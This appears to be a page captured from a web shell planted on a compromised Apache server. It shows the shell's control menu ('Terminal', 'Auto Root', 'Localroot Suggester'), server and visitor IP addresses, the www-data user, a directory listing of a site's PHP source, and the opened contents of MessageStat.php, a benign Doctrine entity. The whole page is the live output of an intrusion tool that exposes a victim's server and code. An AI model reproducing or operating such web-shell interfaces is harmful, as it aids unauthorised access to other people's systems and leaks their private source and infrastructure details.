Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
ContactBundle /
Entity /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
ContactMethod.php
1.14
KB
-rwxrwxr-x
2026-05-25 12:28
ContactReason.php
1.14
KB
-rwxrwxr-x
2026-05-25 12:28
MailChimpBatch.php
3.4
KB
-rwxrwxr-x
2026-04-02 11:48
Message.php
15.03
KB
-rwxrwxr-x
2026-05-18 12:51
MessageAttachment.php
1.78
KB
-rwxrwxr-x
2026-05-18 12:51
MessageCredit.php
6.23
KB
-rwxrwxr-x
2026-05-18 12:51
MessageEmbeddedImage.php
1.64
KB
-rwxrwxr-x
2026-05-18 12:51
MessageError.php
2.37
KB
-rwxrwxr-x
2026-05-18 12:51
MessageRecipient.php
8.45
KB
-rwxrwxr-x
2026-05-18 12:51
MessageStat.php
6.03
KB
-rwxrwxr-x
2026-05-18 12:51
MessageType.php
1.18
KB
-rwxrwxr-x
2026-05-25 12:28
Save
Rename
<?php namespace App\ContactBundle\Entity; use Doctrine\DBAL\Types\Types; use Doctrine\ORM\Mapping as ORM; /** * MessageStat * * @ORM\Table(name="contact_message_stat") * @ORM\Entity(repositoryClass="App\ContactBundle\Repository\MessageStatRepository") */ class MessageStat { /** * @ORM\Id * @ORM\Column(type="string", unique=true) * @ORM\GeneratedValue(strategy="CUSTOM") * @ORM\CustomIdGenerator(class="Ramsey\Uuid\Doctrine\UuidGenerator") */ private $id; /** * @ORM\Column(type="boolean", nullable=true, options={"default": false}) */ private $delivered; /** * @ORM\Column(type="datetime", nullable=true) */ private $delivered_date; /** * @ORM\Column(type="boolean", nullable=true, options={"default": false}) */ private $is_read; /** * @ORM\Column(type="datetime", nullable=true) */ private $read_date; /** * @ORM\Column(type="boolean", nullable=true, options={"default": false}) */ private $unsubscribed; /** * @ORM\Column(type="datetime", nullable=true) */ private $unsubscribed_date; /** * @ORM\Column(type="decimal", precision=2, scale=2, nullable=true) */ private $spam_score; /** * @ORM\Column(type="text", nullable=true) */ private $spam_detail; /** * @ORM\Column(type="text") */ private $track_data; /** * @ORM\ManyToOne(targetEntity="MessageRecipient", inversedBy="message_stat") * @ORM\JoinColumn(name="message_recipient_id", referencedColumnName="id") */ private $message_recipient; /** * Get id * * @return string */ public function getId() { return $this->id; } /** * Set delivered * * @param boolean $delivered * @return MessageStat */ public function setDelivered($delivered) { $this->delivered = $delivered; return $this; } /** * Get delivered * * @return boolean */ public function getDelivered() { return $this->delivered; } /** * Set delivered_date * * @param \DateTime $deliveredDate * @return MessageStat */ public function setDeliveredDate($deliveredDate) { $this->delivered_date = $deliveredDate; return $this; } /** * Get delivered_date * * @return \DateTime */ public function getDeliveredDate() { return $this->delivered_date; } /** * Set is_read * * @param boolean $isRead * @return MessageStat */ public function setIsRead($isRead) { $this->is_read = $isRead; return $this; } /** * Get is_read * * @return boolean */ public function getIsRead() { return $this->is_read; } /** * Set read_date * * @param \DateTime $readDate * @return MessageStat */ public function setReadDate($readDate) { $this->read_date = $readDate; return $this; } /** * Get read_date * * @return \DateTime */ public function getReadDate() { return $this->read_date; } /** * Set unsubscribed * * @param boolean $unsubscribed * @return MessageStat */ public function setUnsubscribed($unsubscribed) { $this->unsubscribed = $unsubscribed; return $this; } /** * Get unsubscribed * * @return boolean */ public function getUnsubscribed() { return $this->unsubscribed; } /** * Set unsubscribed_date * * @param \DateTime $unsubscribedDate * @return MessageStat */ public function setUnsubscribedDate($unsubscribedDate) { $this->unsubscribed_date = $unsubscribedDate; return $this; } /** * Get unsubscribed_date * * @return \DateTime */ public function getUnsubscribedDate() { return $this->unsubscribed_date; } /** * Set message_recipient * * @param \App\ContactBundle\Entity\MessageRecipient $messageRecipient * @return MessageStat */ public function setMessageRecipient(?\App\ContactBundle\Entity\MessageRecipient $messageRecipient = null) { $this->message_recipient = $messageRecipient; return $this; } /** * Get message_recipient * * @return \App\ContactBundle\Entity\MessageRecipient */ public function getMessageRecipient() { return $this->message_recipient; } /** * Set spamScore * * @param integer $spamScore * * @return MessageStat */ public function setSpamScore($spamScore) { $this->spam_score = $spamScore; return $this; } /** * Get spamScore * * @return integer */ public function getSpamScore() { return $this->spam_score; } /** * Set spamDetail * * @param string $spamDetail * * @return MessageStat */ public function setSpamDetail($spamDetail) { $this->spam_detail = $spamDetail; return $this; } /** * Get spamDetail * * @return string */ public function getSpamDetail() { return $this->spam_detail; } /** * Set trackData. * * @param string $trackData * * @return MessageStat */ public function setTrackData($trackData) { $this->track_data = $trackData; return $this; } /** * Get trackData. * * @return string */ public function getTrackData() { return $this->track_data; } public function isDelivered(): ?bool { return $this->delivered; } public function isIsRead(): ?bool { return $this->is_read; } public function isUnsubscribed(): ?bool { return $this->unsubscribed; } public function isRead(): ?bool { return $this->is_read; } }